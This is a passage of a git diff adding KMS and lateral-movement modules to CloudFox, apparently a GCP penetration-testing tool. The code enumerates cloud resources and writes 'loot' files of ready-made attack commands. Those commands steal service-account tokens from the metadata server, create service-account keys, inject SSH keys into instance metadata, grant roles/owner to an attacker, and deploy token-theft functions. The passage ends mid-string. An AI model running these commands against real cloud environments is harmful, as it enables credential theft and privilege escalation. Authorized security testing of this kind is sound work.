Thread-safe store per-project + m.mu.Lock() + m.ProjectKeyRings[projectID] = keyRings + m.ProjectCryptoKeys[projectID] = keys + + for _, key := range keys { + m.addKeyToLoot(projectID, key) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d key ring(s), %d key(s) in project %s", len(keyRings), len(keys), projectID), globals.GCP_KMS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *KMSModule) addKeyToLoot(projectID string, key KMSService.CryptoKeyInfo) { + lootFile := m.LootMap[projectID]["kms-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# KMS KEY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, KeyRing: %s, Location: %s\n"+ + "# Purpose: %s, Protection: %s\n", + key.Name, + key.ProjectID, key.KeyRing, key.Location, + key.Purpose, key.ProtectionLevel, + ) + + // Commands + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe key:\n"+ + "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud kms keys get-iam-policy %s --keyring=%s --location=%s --project=%s\n"+ + "# List versions:\n"+ + "gcloud kms keys versions list --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + + // Purpose-specific commands + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + switch key.Purpose { + case "ENCRYPT_DECRYPT": + lootFile.Contents += fmt.Sprintf( + "# Encrypt data:\n"+ + "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- 
--ciphertext-file=encrypted.bin\n"+ + "# Decrypt data:\n"+ + "gcloud kms decrypt --key=%s --keyring=%s --location=%s --project=%s --ciphertext-file=encrypted.bin --plaintext-file=-\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_SIGN": + lootFile.Contents += fmt.Sprintf( + "# Sign data:\n"+ + "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_DECRYPT": + lootFile.Contents += fmt.Sprintf( + "# Decrypt data:\n"+ + "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getKeysHeader returns the header for the crypto keys table +func (m *KMSModule) getKeysHeader() []string { + return []string{ + "Project", + "Key Name", + "Key Ring", + "Location", + "Purpose", + "Protection", + "Version", + "State", + "Rotation", + "Public Encrypt", + "Public Decrypt", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// getKeyRingsHeader returns the header 
for the key rings table +func (m *KMSModule) getKeyRingsHeader() []string { + return []string{ + "Project", + "Key Ring", + "Location", + "Key Count", + } +} + +// keysToTableBody converts crypto keys to table body rows +func (m *KMSModule) keysToTableBody(keys []KMSService.CryptoKeyInfo) [][]string { + var body [][]string + for _, key := range keys { + // Format rotation + rotation := "-" + if key.RotationPeriod != "" { + rotation = formatDuration(key.RotationPeriod) + } + + // Format protection level + protection := key.ProtectionLevel + if protection == "" { + protection = "SOFTWARE" + } + + // If key has IAM bindings, create one row per binding + if len(key.IAMBindings) > 0 { + for _, binding := range key.IAMBindings { + body = append(body, []string{ + m.GetProjectName(key.ProjectID), + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + shared.BoolToYesNo(key.IsPublicEncrypt), + shared.BoolToYesNo(key.IsPublicDecrypt), + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(key.ProjectID), + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + shared.BoolToYesNo(key.IsPublicEncrypt), + shared.BoolToYesNo(key.IsPublicDecrypt), + "-", + "-", + }) + } + } + return body +} + +// keyRingsToTableBody converts key rings to table body rows +func (m *KMSModule) keyRingsToTableBody(keyRings []KMSService.KeyRingInfo) [][]string { + var body [][]string + for _, kr := range keyRings { + body = append(body, []string{ + m.GetProjectName(kr.ProjectID), + kr.Name, + kr.Location, + fmt.Sprintf("%d", kr.KeyCount), + }) + } + return body +} + +// buildTablesForProject builds table files for a single project +func (m *KMSModule) buildTablesForProject(projectID string) []internal.TableFile { + keys := 
m.ProjectCryptoKeys[projectID] + keyRings := m.ProjectKeyRings[projectID] + + keysBody := m.keysToTableBody(keys) + keyRingsBody := m.keyRingsToTableBody(keyRings) + + var tableFiles []internal.TableFile + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: m.getKeysHeader(), + Body: keysBody, + }) + } + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: m.getKeyRingsHeader(), + Body: keyRingsBody, + }) + } + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *KMSModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectCryptoKeys { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectKeyRings { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = KMSOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", 
err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *KMSModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allKeys := m.getAllCryptoKeys() + allKeyRings := m.getAllKeyRings() + + keysBody := m.keysToTableBody(allKeys) + keyRingsBody := m.keyRingsToTableBody(allKeyRings) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build table files + var tableFiles []internal.TableFile + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: m.getKeysHeader(), + Body: keysBody, + }) + } + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: m.getKeyRingsHeader(), + Body: keyRingsBody, + }) + } + + output := KMSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatPurpose formats key purpose for display +func formatPurpose(purpose string) string { + switch purpose { + case "ENCRYPT_DECRYPT": + return "Symmetric" + case "ASYMMETRIC_SIGN": + return "Sign" + case "ASYMMETRIC_DECRYPT": + return "Asymm Decrypt" + case "MAC": + return 
"MAC" + default: + return purpose + } +} + +// formatDuration formats a duration string for display +func formatDuration(duration string) string { + // Duration is in format like "7776000s" (90 days) + duration = strings.TrimSuffix(duration, "s") + if duration == "" { + return "-" + } + + // Parse seconds + var seconds int64 + fmt.Sscanf(duration, "%d", &seconds) + + if seconds == 0 { + return "-" + } + + days := seconds / 86400 + if days > 0 { + return fmt.Sprintf("%dd", days) + } + + hours := seconds / 3600 + if hours > 0 { + return fmt.Sprintf("%dh", hours) + } + + return fmt.Sprintf("%ds", seconds) +} diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go new file mode 100755 index 00000000..e59cb6b2 --- /dev/null +++ b/gcp/commands/lateralmovement.go @@ -0,0 +1,1014 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +// Module name constant +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" + +var GCPLateralMovementCommand = &cobra.Command{ + Use: GCP_LATERALMOVEMENT_MODULE_NAME, + Aliases: []string{"lateral", "pivot"}, + Short: "Map lateral movement paths, credential theft vectors, and pivot opportunities", + Long: `Identify lateral movement opportunities within and across GCP projects. 
+ +This module uses FoxMapper graph data for permission-based analysis combined with +direct enumeration of compute resources for token theft vectors. + +Features: +- Maps service account impersonation chains (SA → SA → SA) +- Identifies token creator permissions (lateral movement via impersonation) +- Finds cross-project access paths +- Detects VM metadata abuse vectors +- Analyzes credential storage locations (secrets, environment variables) +- Generates exploitation commands for penetration testing + +Prerequisites: +- Run 'foxmapper gcp graph create' for permission-based analysis + +This module helps identify how an attacker could move laterally after gaining +initial access to a GCP environment.`, + Run: runGCPLateralMovementCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +// LateralMovementPath represents a lateral movement opportunity +type LateralMovementPath struct { + Source string // Starting point (principal or resource) + SourceType string // Type of source (serviceAccount, user, compute_instance, etc.) 
+ Target string // Target resource/identity + Method string // How the lateral movement is achieved + Category string // Category of lateral movement + Permissions []string // Permissions required + Description string // Human-readable description + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + ExploitCommand string // Command to exploit + ProjectID string // Project where this path exists +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LateralMovementModule struct { + gcpinternal.BaseGCPModule + + // Paths from enumeration + ProjectPaths map[string][]LateralMovementPath // projectID -> paths + AllPaths []LateralMovementPath // All paths combined + + // FoxMapper findings + FoxMapperFindings []foxmapperservice.LateralFinding // FoxMapper-based findings + FoxMapperCache *gcpinternal.FoxMapperCache + + // OrgCache for ancestry lookups + OrgCache *gcpinternal.OrgCache + + // Loot + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LateralMovementOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LateralMovementOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LateralMovementOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_LATERALMOVEMENT_MODULE_NAME) + if err != nil { + return + } + + module := &LateralMovementModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPaths: make(map[string][]LateralMovementPath), + AllPaths: []LateralMovementPath{}, + FoxMapperFindings: []foxmapperservice.LateralFinding{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + + 
module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) + + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + // Process each project for actual token theft vectors + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + + // Consolidate project paths + for _, paths := range m.ProjectPaths { + m.AllPaths = append(m.AllPaths, paths...) 
+ } + + // Analyze permission-based lateral movement using FoxMapper + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Analyzing permission-based lateral movement using FoxMapper...", GCP_LATERALMOVEMENT_MODULE_NAME) + svc := m.FoxMapperCache.GetService() + allFindings := svc.AnalyzeLateral("") + + // Filter findings to only include principals from specified projects + m.FoxMapperFindings = m.filterFindingsByProjects(allFindings) + + if len(m.FoxMapperFindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d permission-based lateral movement techniques", len(m.FoxMapperFindings)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + } else { + logger.InfoM("No FoxMapper data found - skipping permission-based analysis. Run 'foxmapper gcp graph create' for full analysis.", GCP_LATERALMOVEMENT_MODULE_NAME) + } + + // Check results + hasResults := len(m.AllPaths) > 0 || len(m.FoxMapperFindings) > 0 + + if !hasResults { + logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) + return + } + + // Count by category for summary + categoryCounts := make(map[string]int) + for _, path := range m.AllPaths { + categoryCounts[path.Category]++ + } + + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s) from enumeration", len(m.AllPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + if len(m.FoxMapperFindings) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d permission-based lateral movement technique(s)", len(m.FoxMapperFindings)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// filterFindingsByProjects filters FoxMapper findings to only include principals +// from the specified projects (via -p or -l flags) OR principals without a clear project +func (m *LateralMovementModule) filterFindingsByProjects(findings []foxmapperservice.LateralFinding) []foxmapperservice.LateralFinding { + // Build a set of specified project IDs for fast lookup + specifiedProjects := make(map[string]bool) + for _, projectID := range 
m.ProjectIDs { + specifiedProjects[projectID] = true + } + + var filtered []foxmapperservice.LateralFinding + + for _, finding := range findings { + var filteredPrincipals []foxmapperservice.PrincipalAccess + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: SA from specified project OR user/group (no project) + if specifiedProjects[principalProject] || principalProject == "" { + filteredPrincipals = append(filteredPrincipals, p) + } + } + + if len(filteredPrincipals) > 0 { + filteredFinding := finding + filteredFinding.Principals = filteredPrincipals + filtered = append(filtered, filteredFinding) + } + } + + return filtered +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LateralMovementModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["lateral-movement-commands"] = &internal.LootFile{ + Name: "lateral-movement-commands", + Contents: "# Lateral Movement Exploit Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } +} + +// getLateralExploitCommand returns specific exploitation commands for a lateral movement permission +func getLateralExploitCommand(permission, principal, project string) string { + commands := map[string]string{ + // Service Account Impersonation + "iam.serviceAccounts.getAccessToken": "gcloud auth print-access-token --impersonate-service-account=TARGET_SA", + "iam.serviceAccountKeys.create": "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA", + "iam.serviceAccounts.signBlob": "gcloud iam service-accounts sign-blob --iam-account=TARGET_SA input.txt output.sig", + "iam.serviceAccounts.signJwt": "# Sign JWT to impersonate SA\ngcloud iam service-accounts sign-jwt --iam-account=TARGET_SA claim.json signed.jwt", + 
"iam.serviceAccounts.getOpenIdToken": "gcloud auth print-identity-token --impersonate-service-account=TARGET_SA", + "iam.serviceAccounts.actAs": "# actAs allows deploying resources with this SA\ngcloud run deploy SERVICE --service-account=TARGET_SA", + + // Compute Access + "compute.instances.osLogin": "gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT", + "compute.instances.setMetadata": "gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\"", + "compute.projects.setCommonInstanceMetadata": "gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\"", + "compute.instances.getSerialPortOutput": "gcloud compute instances get-serial-port-output INSTANCE --zone=ZONE", + + // GKE Access + "container.clusters.getCredentials": "gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT", + "container.pods.exec": "kubectl exec -it POD -- /bin/sh", + "container.pods.attach": "kubectl attach -it POD", + + // Serverless + "cloudfunctions.functions.create": "gcloud functions deploy FUNC --runtime=python311 --service-account=TARGET_SA --trigger-http", + "cloudfunctions.functions.update": "gcloud functions deploy FUNC --service-account=TARGET_SA", + "run.services.create": "gcloud run deploy SERVICE --image=IMAGE --service-account=TARGET_SA", + "run.services.update": "gcloud run services update SERVICE --service-account=TARGET_SA", + + // IAM Policy Modification + "resourcemanager.projects.setIamPolicy": "gcloud projects add-iam-policy-binding PROJECT --member=user:ATTACKER --role=roles/owner", + "resourcemanager.folders.setIamPolicy": "gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=user:ATTACKER --role=roles/owner", + "resourcemanager.organizations.setIamPolicy": "gcloud organizations add-iam-policy-binding ORG_ID --member=user:ATTACKER --role=roles/owner", + } + + cmd, ok := commands[permission] + if !ok { + return 
fmt.Sprintf("# No specific command for %s - check gcloud documentation", permission) + } + + if project != "" && project != "-" { + cmd = strings.ReplaceAll(cmd, "PROJECT", project) + } + + return cmd +} + +// generatePlaybookForProject generates a loot file specific to a project +func (m *LateralMovementModule) generatePlaybookForProject(projectID string) *internal.LootFile { + var sb strings.Builder + sb.WriteString("# GCP Lateral Movement Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") + + // Token theft vectors for this project + if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { + sb.WriteString("# === TOKEN THEFT VECTORS ===\n\n") + + for _, path := range paths { + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s -> %s\n"+ + "# =============================================================================\n", path.Source, path.Target)) + sb.WriteString(fmt.Sprintf("# Method: %s\n", path.Method)) + sb.WriteString(fmt.Sprintf("# Category: %s\n", path.Category)) + if path.ExploitCommand != "" { + sb.WriteString(path.ExploitCommand) + sb.WriteString("\n\n") + } + } + } + + // Permission-based findings - filter to this project's principals + users/groups + if len(m.FoxMapperFindings) > 0 { + hasFindings := false + + for _, finding := range m.FoxMapperFindings { + var relevantPrincipals []foxmapperservice.PrincipalAccess + + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if principalProject == projectID || principalProject == "" { + relevantPrincipals = append(relevantPrincipals, p) + } + } + + if len(relevantPrincipals) == 0 { + continue + } + + if !hasFindings { + sb.WriteString("# === PERMISSION-BASED LATERAL MOVEMENT ===\n\n") + hasFindings = true + } + + 
sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s (%s)\n"+ + "# =============================================================================\n", finding.Permission, finding.Category)) + sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description)) + + for _, p := range relevantPrincipals { + project := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if project == "" { + project = projectID + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + sb.WriteString(fmt.Sprintf("# %s (%s)\n", p.Principal, principalType)) + + if p.IsServiceAccount { + sb.WriteString(fmt.Sprintf("# Impersonate first:\ngcloud config set auth/impersonate_service_account %s\n\n", p.Principal)) + } + + cmd := getLateralExploitCommand(finding.Permission, p.Principal, project) + sb.WriteString(cmd) + sb.WriteString("\n\n") + + if p.IsServiceAccount { + sb.WriteString("# Reset impersonation when done:\n# gcloud config unset auth/impersonate_service_account\n\n") + } + } + } + } + + contents := sb.String() + if contents == fmt.Sprintf("# GCP Lateral Movement Commands\n# Project: %s\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", projectID) { + return nil + } + + return &internal.LootFile{ + Name: "lateral-movement-commands", + Contents: contents, + } +} + +func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + // 1. Find impersonation chains + m.findImpersonationChains(ctx, projectID, logger) + + // 2. Find token theft vectors (compute instances, functions, etc.) 
+ m.findTokenTheftVectors(ctx, projectID, logger) +} + +// findImpersonationChains finds service account impersonation paths +func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, projectID string, logger internal.Logger) { + iamService := IAMService.New() + + // Get all service accounts (without keys - not needed for impersonation analysis) + serviceAccounts, err := iamService.ServiceAccountsBasic(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get service accounts in project %s", projectID)) + return + } + + // For each SA, check who can impersonate it + for _, sa := range serviceAccounts { + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Token creators can impersonate + for _, creator := range impersonationInfo.TokenCreators { + if shared.IsPublicPrincipal(creator) { + continue + } + + riskLevel := "HIGH" + if impersonationInfo.RiskLevel == "CRITICAL" { + riskLevel = "CRITICAL" + } + + path := LateralMovementPath{ + Source: creator, + SourceType: shared.GetPrincipalType(creator), + Target: sa.Email, + Method: "Impersonate (Get Token)", + Category: "Service Account Impersonation", + Permissions: []string{"iam.serviceAccounts.getAccessToken"}, + Description: fmt.Sprintf("%s can impersonate %s", creator, sa.Email), + RiskLevel: riskLevel, + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + + // Key creators can create persistent access + for _, creator := range impersonationInfo.KeyCreators { + if shared.IsPublicPrincipal(creator) { + continue + } + + path := LateralMovementPath{ + Source: creator, + SourceType: 
shared.GetPrincipalType(creator), + Target: sa.Email, + Method: "Create Key", + Category: "Service Account Key Creation", + Permissions: []string{"iam.serviceAccountKeys.create"}, + Description: fmt.Sprintf("%s can create keys for %s", creator, sa.Email), + RiskLevel: "CRITICAL", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + } +} + +// findTokenTheftVectors finds compute resources where tokens can be stolen +func (m *LateralMovementModule) findTokenTheftVectors(ctx context.Context, projectID string, logger internal.Logger) { + // Find Compute Engine instances with service accounts + m.findComputeInstanceVectors(ctx, projectID, logger) + + // Find Cloud Functions with service accounts + m.findCloudFunctionVectors(ctx, projectID, logger) + + // Find Cloud Run services with service accounts + m.findCloudRunVectors(ctx, projectID, logger) + + // Find GKE clusters with node service accounts + m.findGKEVectors(ctx, projectID, logger) +} + +// findComputeInstanceVectors finds compute instances where tokens can be stolen via metadata server +func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, projectID string, logger internal.Logger) { + computeService := ComputeEngineService.New() + + instances, err := computeService.Instances(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get compute instances in project %s", projectID)) + } + return + } + + for _, instance := range instances { + if len(instance.ServiceAccounts) == 0 { + continue + } + + for _, sa := range instance.ServiceAccounts { + if sa.Email == "" { + continue + } + + path := LateralMovementPath{ + Source: 
instance.Name, + SourceType: "compute_instance", + Target: sa.Email, + Method: "Steal Token (Metadata)", + Category: "Compute Instance Token Theft", + Permissions: []string{"compute.instances.get", "compute.instances.osLogin"}, + Description: fmt.Sprintf("Access to instance %s allows stealing token for %s", instance.Name, sa.Email), + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf(`# SSH into instance and steal token +gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"'`, + instance.Name, instance.Zone, projectID), + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + } +} + +// findCloudFunctionVectors finds Cloud Functions where tokens can be stolen +func (m *LateralMovementModule) findCloudFunctionVectors(ctx context.Context, projectID string, logger internal.Logger) { + functionsService := FunctionsService.New() + + functions, err := functionsService.Functions(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Functions in project %s", projectID)) + } + return + } + + for _, fn := range functions { + if fn.ServiceAccount == "" { + continue + } + + exploitCmd := fmt.Sprintf(`# Deploy function with target SA to steal token +# Requires: cloudfunctions.functions.create + iam.serviceAccounts.actAs +gcloud functions deploy token-theft-poc \ + --gen2 --runtime=python311 --region=%s \ + --entry-point=steal_token --trigger-http --allow-unauthenticated \ + --service-account=%s --project=%s`, + fn.Region, fn.ServiceAccount, projectID) + + path := LateralMovementPath{ + Source: fn.Name, + SourceType: "cloud_function", + Target: fn.ServiceAccount, + Method: "Steal Token 
(Function)", + Category: "Cloud Function Token Theft", + Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, + Description: fmt.Sprintf("Cloud Function %s runs with SA %s", fn.Name, fn.ServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } +} + +// findCloudRunVectors finds Cloud Run services where tokens can be stolen +func (m *LateralMovementModule) findCloudRunVectors(ctx context.Context, projectID string, logger internal.Logger) { + cloudRunService := CloudRunService.New() + + services, err := cloudRunService.Services(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Run services in project %s", projectID)) + } + return + } + + for _, svc := range services { + if svc.ServiceAccount == "" { + continue + } + + exploitCmd := fmt.Sprintf(`# Deploy Cloud Run service with target SA to steal token +# Requires: run.services.create + iam.serviceAccounts.actAs +gcloud run deploy token-theft-poc \ + --image 